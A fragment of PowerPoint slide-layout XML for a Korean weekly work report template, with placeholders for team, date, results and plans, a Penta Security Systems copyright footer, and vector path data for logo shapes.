              <a:gd name="T7" fmla="*/ 973 h 9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" h="973">
                <a:moveTo>
                  <a:pt x="0" y="973"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="316" y="973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="316" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="97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22716357"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="374400" y="5883624"/>
          <a:ext cx="8395200" cy="60480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209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24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진행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A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신규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A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완료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A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24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4400" y="439200"/>
            <a:ext cx="1454400" cy="442800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1800" b="1" baseline="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dirty="0"/>
              <a:t>주간업무보고</a:t>
            </a:r>
            <a:endParaRPr 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3" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1950181" y="439200"/>
            <a:ext cx="4302771" cy="4428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1800" b="1" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="0058A6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kumimoji="1" lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>팀명</a:t>
            </a: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7458690" y="662400"/>
            <a:ext cx="1310910" cy="442800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1400" b="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="898989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r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>날짜</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="16" name="표 15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329307182"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="374400" y="1121869"/>
          <a:ext cx="8395200" cy="4613042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419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2400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ACA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0642"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FA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374400" y="1121868"/>
            <a:ext cx="4189916" cy="307361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1200" baseline="0">
                <a:latin typeface="(한글 글꼴 사용)"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>실적</a:t>
            </a:r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6" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4564316" y="1121867"/>
            <a:ext cx="4205051" cy="307362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FontTx/>
              <a:buNone/>
              <a:defRPr sz="1200" baseline="0">
                <a:latin typeface="(한글 글꼴 사용)"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>계획</a:t>
            </a:r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374399" y="6198025"/>
            <a:ext cx="2092175" cy="290399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1000">
                <a:ln>
                  <a:noFill/>
                </a:ln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en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>Num</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17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2469358" y="6198025"/>
            <a:ext cx="2092175" cy="290399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1000">
                <a:ln>
                  <a:noFill/>
                </a:ln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en-US" altLang="ko-KR"/>
              <a:t>Num</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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4572000" y="6198025"/>
            <a:ext cx="2092175" cy="290399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1000">
                <a:ln>
                  <a:noFill/>
                </a:ln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en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>Num</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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6677425" y="6198025"/>
            <a:ext cx="2092175" cy="290399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FontTx/>
              <a:buNone/>
              <a:defRPr sz="1000">
                <a:ln>
                  <a:noFill/>
                </a:ln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en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>Num</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="슬라이드 번호 개체 틀 15"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8874000" y="6543248"/>
            <a:ext cx="234000" cy="252412"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{2D94ACED-6144-4B78-9E59-762D97A9E2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27" name="Freeform 42"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8462195" y="0"/>
            <a:ext cx="681805" cy="494754"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 842"/>
              <a:gd name="T1" fmla="*/ 0 h 611"/>
              <a:gd name="T2" fmla="*/ 842 w 842"/>
              <a:gd name="T3" fmla="*/ 0 h 611"/>
              <a:gd name="T4" fmla="*/ 842 w 842"/>
              <a:gd name="T5" fmla="*/ 611 h 611"/>
              <a:gd name="T6" fmla="*/ 0 w 842"/>
              <a:gd name="T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2" h="611">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="842" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="842" y="611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31A5194B-F471-BA4F-AA6D-348C8D5440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5115" y="1429230"/>
            <a:ext cx="4189201" cy="4305681"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="72000" tIns="72000" rIns="72000" bIns="72000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="108000" indent="-108000">
              <a:buClr>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buFont typeface=".Lucida Grande UI Regular"/>
              <a:buChar char="▪"/>
              <a:defRPr sz="1100" b="1" baseline="0">
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="216000" indent="-108000">
              <a:buClr>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buFont typeface=".Lucida Grande UI Regular"/>
              <a:buChar char="▫"/>
              <a:defRPr sz="1050" baseline="0">
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="360000" indent="-144000">
              <a:buClr>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buFont typeface="System Font Regular"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1000" baseline="0">
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="538163" indent="-168275">
              <a:buClr>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buFont typeface="System Font Regular"/>
              <a:buChar char="◦"/>
              <a:tabLst/>
              <a:defRPr sz="1000" b="0" i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4pPr>
            <a:lvl5pPr marL="669925" indent="-138113"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  <a:tabLst/>
              <a:defRPr sz="950" b="0" i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5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Level_01</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Level_02</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Level_03</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Level_04</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Level_05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F61383E3-AEB1-D046-974F-973BD59F81E6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4580399" y="1429230"/>
            <a:ext cx="4189201" cy="4305681"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="72000" tIns="72000" rIns="72000" bIns="72000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="108000" indent="-108000">
              <a:buClr>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buFont typeface=".Lucida Grande UI Regular"/>
              <a:buChar char="▪"/>
              <a:defRPr sz="1100" b="1" baseline="0">
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="216000" indent="-108000">
              <a:buClr>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buFont typeface=".Lucida Grande UI Regular"/>
              <a:buChar char="▫"/>
              <a:defRPr sz="1050" baseline="0">
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="360000" indent="-144000">
              <a:buClr>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buFont typeface="System Font Regular"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1000" baseline="0">
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="538163" indent="-168275">
              <a:buClr>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buFont typeface="System Font Regular"/>
              <a:buChar char="◦"/>
              <a:tabLst/>
              <a:defRPr sz="1000" b="0" i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4pPr>
            <a:lvl5pPr marL="669925" indent="-138113">
              <a:buClr>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
              <a:tabLst/>
              <a:defRPr sz="950" b="0" i="0">
                <a:latin typeface="Malgun Gothic Semilight" panose="020B0502040204020203" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Malgun Gothic Semilight" panose="020B0502040204020203" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Malgun Gothic Semilight" panose="020B0502040204020203" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Level_01</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Level_02</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Level_03</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Level_04</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Level_05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뒷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직사각형 102">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{914D8CC8-9F03-CB4C-A13D-BF4D19680809}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6584386"/>
            <a:ext cx="9144000" cy="27361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44AE77EE-8378-294F-92B8-DE4205270B19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5506" y="6621166"/>
            <a:ext cx="9144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700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Copyright Penta Security Systems Inc. All rights reserved.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="700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331" name="그룹 103">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D72E77C-DD46-B743-9EEB-C532245B993C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3838074" y="2741075"/>
            <a:ext cx="1467852" cy="297378"/>
            <a:chOff x="3940200" y="2689058"/>
            <a:chExt cx="1588100" cy="321739"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="332" name="그룹 104">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF5F129A-B82F-DA4B-AFED-2DFAD6E96F84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3940200" y="2689058"/>
              <a:ext cx="1588100" cy="182257"/>
              <a:chOff x="3276600" y="1049338"/>
              <a:chExt cx="2559050" cy="293688"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="359" name="Freeform 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FFFC7C4-A4A6-4840-BB25-8A2578A65F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3213" y="1049338"/>
                <a:ext cx="179388" cy="292100"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 130 w 339"/>
                  <a:gd name="T1" fmla="*/ 0 h 551"/>
                  <a:gd name="T2" fmla="*/ 298 w 339"/>
                  <a:gd name="T3" fmla="*/ 0 h 551"/>
                  <a:gd name="T4" fmla="*/ 265 w 339"/>
                  <a:gd name="T5" fmla="*/ 125 h 551"/>
                  <a:gd name="T6" fmla="*/ 339 w 339"/>
                  <a:gd name="T7" fmla="*/ 125 h 551"/>
                  <a:gd name="T8" fmla="*/ 315 w 339"/>
                  <a:gd name="T9" fmla="*/ 219 h 551"/>
                  <a:gd name="T10" fmla="*/ 240 w 339"/>
                  <a:gd name="T11" fmla="*/ 219 h 551"/>
                  <a:gd name="T12" fmla="*/ 188 w 339"/>
                  <a:gd name="T13" fmla="*/ 424 h 551"/>
                  <a:gd name="T14" fmla="*/ 186 w 339"/>
                  <a:gd name="T15" fmla="*/ 436 h 551"/>
                  <a:gd name="T16" fmla="*/ 188 w 339"/>
                  <a:gd name="T17" fmla="*/ 445 h 551"/>
                  <a:gd name="T18" fmla="*/ 195 w 339"/>
                  <a:gd name="T19" fmla="*/ 452 h 551"/>
                  <a:gd name="T20" fmla="*/ 205 w 339"/>
                  <a:gd name="T21" fmla="*/ 455 h 551"/>
                  <a:gd name="T22" fmla="*/ 220 w 339"/>
                  <a:gd name="T23" fmla="*/ 457 h 551"/>
                  <a:gd name="T24" fmla="*/ 259 w 339"/>
                  <a:gd name="T25" fmla="*/ 457 h 551"/>
                  <a:gd name="T26" fmla="*/ 234 w 339"/>
                  <a:gd name="T27" fmla="*/ 551 h 551"/>
                  <a:gd name="T28" fmla="*/ 135 w 339"/>
                  <a:gd name="T29" fmla="*/ 551 h 551"/>
                  <a:gd name="T30" fmla="*/ 101 w 339"/>
                  <a:gd name="T31" fmla="*/ 551 h 551"/>
                  <a:gd name="T32" fmla="*/ 73 w 339"/>
                  <a:gd name="T33" fmla="*/ 548 h 551"/>
                  <a:gd name="T34" fmla="*/ 50 w 339"/>
                  <a:gd name="T35" fmla="*/ 543 h 551"/>
                  <a:gd name="T36" fmla="*/ 32 w 339"/>
                  <a:gd name="T37" fmla="*/ 536 h 551"/>
                  <a:gd name="T38" fmla="*/ 20 w 339"/>
                  <a:gd name="T39" fmla="*/ 525 h 551"/>
                  <a:gd name="T40" fmla="*/ 11 w 339"/>
                  <a:gd name="T41" fmla="*/ 510 h 551"/>
                  <a:gd name="T42" fmla="*/ 9 w 339"/>
                  <a:gd name="T43" fmla="*/ 491 h 551"/>
                  <a:gd name="T44" fmla="*/ 10 w 339"/>
                  <a:gd name="T45" fmla="*/ 467 h 551"/>
                  <a:gd name="T46" fmla="*/ 16 w 339"/>
                  <a:gd name="T47" fmla="*/ 439 h 551"/>
                  <a:gd name="T48" fmla="*/ 73 w 339"/>
                  <a:gd name="T49" fmla="*/ 219 h 551"/>
                  <a:gd name="T50" fmla="*/ 0 w 339"/>
                  <a:gd name="T51" fmla="*/ 219 h 551"/>
                  <a:gd name="T52" fmla="*/ 23 w 339"/>
                  <a:gd name="T53" fmla="*/ 125 h 551"/>
                  <a:gd name="T54" fmla="*/ 98 w 339"/>
                  <a:gd name="T55" fmla="*/ 125 h 551"/>
                  <a:gd name="T56" fmla="*/ 130 w 339"/>
                  <a:gd name="T57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39" h="551">
                    <a:moveTo>
                      <a:pt x="130" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="298" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="339" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="445"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="455"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="548"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="543"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="491"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="439"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="0060A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0" name="Freeform 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3214B8D4-0F0B-3843-84B0-3E2B99070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0375" y="1116013"/>
                <a:ext cx="260350" cy="225425"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 87 w 493"/>
                  <a:gd name="T1" fmla="*/ 0 h 426"/>
                  <a:gd name="T2" fmla="*/ 382 w 493"/>
                  <a:gd name="T3" fmla="*/ 0 h 426"/>
                  <a:gd name="T4" fmla="*/ 398 w 493"/>
                  <a:gd name="T5" fmla="*/ 0 h 426"/>
                  <a:gd name="T6" fmla="*/ 415 w 493"/>
                  <a:gd name="T7" fmla="*/ 3 h 426"/>
                  <a:gd name="T8" fmla="*/ 431 w 493"/>
                  <a:gd name="T9" fmla="*/ 7 h 426"/>
                  <a:gd name="T10" fmla="*/ 449 w 493"/>
                  <a:gd name="T11" fmla="*/ 13 h 426"/>
                  <a:gd name="T12" fmla="*/ 464 w 493"/>
                  <a:gd name="T13" fmla="*/ 22 h 426"/>
                  <a:gd name="T14" fmla="*/ 477 w 493"/>
                  <a:gd name="T15" fmla="*/ 34 h 426"/>
                  <a:gd name="T16" fmla="*/ 486 w 493"/>
                  <a:gd name="T17" fmla="*/ 49 h 426"/>
                  <a:gd name="T18" fmla="*/ 492 w 493"/>
                  <a:gd name="T19" fmla="*/ 68 h 426"/>
                  <a:gd name="T20" fmla="*/ 493 w 493"/>
                  <a:gd name="T21" fmla="*/ 89 h 426"/>
                  <a:gd name="T22" fmla="*/ 489 w 493"/>
                  <a:gd name="T23" fmla="*/ 115 h 426"/>
                  <a:gd name="T24" fmla="*/ 408 w 493"/>
                  <a:gd name="T25" fmla="*/ 426 h 426"/>
                  <a:gd name="T26" fmla="*/ 112 w 493"/>
                  <a:gd name="T27" fmla="*/ 426 h 426"/>
                  <a:gd name="T28" fmla="*/ 88 w 493"/>
                  <a:gd name="T29" fmla="*/ 426 h 426"/>
                  <a:gd name="T30" fmla="*/ 65 w 493"/>
                  <a:gd name="T31" fmla="*/ 423 h 426"/>
                  <a:gd name="T32" fmla="*/ 46 w 493"/>
                  <a:gd name="T33" fmla="*/ 417 h 426"/>
                  <a:gd name="T34" fmla="*/ 28 w 493"/>
                  <a:gd name="T35" fmla="*/ 408 h 426"/>
                  <a:gd name="T36" fmla="*/ 15 w 493"/>
                  <a:gd name="T37" fmla="*/ 397 h 426"/>
                  <a:gd name="T38" fmla="*/ 6 w 493"/>
                  <a:gd name="T39" fmla="*/ 381 h 426"/>
                  <a:gd name="T40" fmla="*/ 0 w 493"/>
                  <a:gd name="T41" fmla="*/ 363 h 426"/>
                  <a:gd name="T42" fmla="*/ 0 w 493"/>
                  <a:gd name="T43" fmla="*/ 339 h 426"/>
                  <a:gd name="T44" fmla="*/ 6 w 493"/>
                  <a:gd name="T45" fmla="*/ 311 h 426"/>
                  <a:gd name="T46" fmla="*/ 32 w 493"/>
                  <a:gd name="T47" fmla="*/ 210 h 426"/>
                  <a:gd name="T48" fmla="*/ 219 w 493"/>
                  <a:gd name="T49" fmla="*/ 134 h 426"/>
                  <a:gd name="T50" fmla="*/ 181 w 493"/>
                  <a:gd name="T51" fmla="*/ 281 h 426"/>
                  <a:gd name="T52" fmla="*/ 178 w 493"/>
                  <a:gd name="T53" fmla="*/ 301 h 426"/>
                  <a:gd name="T54" fmla="*/ 179 w 493"/>
                  <a:gd name="T55" fmla="*/ 314 h 426"/>
                  <a:gd name="T56" fmla="*/ 184 w 493"/>
                  <a:gd name="T57" fmla="*/ 324 h 426"/>
                  <a:gd name="T58" fmla="*/ 195 w 493"/>
                  <a:gd name="T59" fmla="*/ 330 h 426"/>
                  <a:gd name="T60" fmla="*/ 210 w 493"/>
                  <a:gd name="T61" fmla="*/ 332 h 426"/>
                  <a:gd name="T62" fmla="*/ 266 w 493"/>
                  <a:gd name="T63" fmla="*/ 332 h 426"/>
                  <a:gd name="T64" fmla="*/ 316 w 493"/>
                  <a:gd name="T65" fmla="*/ 144 h 426"/>
                  <a:gd name="T66" fmla="*/ 319 w 493"/>
                  <a:gd name="T67" fmla="*/ 126 h 426"/>
                  <a:gd name="T68" fmla="*/ 317 w 493"/>
                  <a:gd name="T69" fmla="*/ 112 h 426"/>
                  <a:gd name="T70" fmla="*/ 313 w 493"/>
                  <a:gd name="T71" fmla="*/ 101 h 426"/>
                  <a:gd name="T72" fmla="*/ 301 w 493"/>
                  <a:gd name="T73" fmla="*/ 95 h 426"/>
                  <a:gd name="T74" fmla="*/ 286 w 493"/>
                  <a:gd name="T75" fmla="*/ 94 h 426"/>
                  <a:gd name="T76" fmla="*/ 62 w 493"/>
                  <a:gd name="T77" fmla="*/ 94 h 426"/>
                  <a:gd name="T78" fmla="*/ 87 w 493"/>
                  <a:gd name="T79" fmla="*/ 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93" h="426">
                    <a:moveTo>
                      <a:pt x="87" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="382" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="464" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="486" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="492" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="408" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="417"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="381"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="339"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="324"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
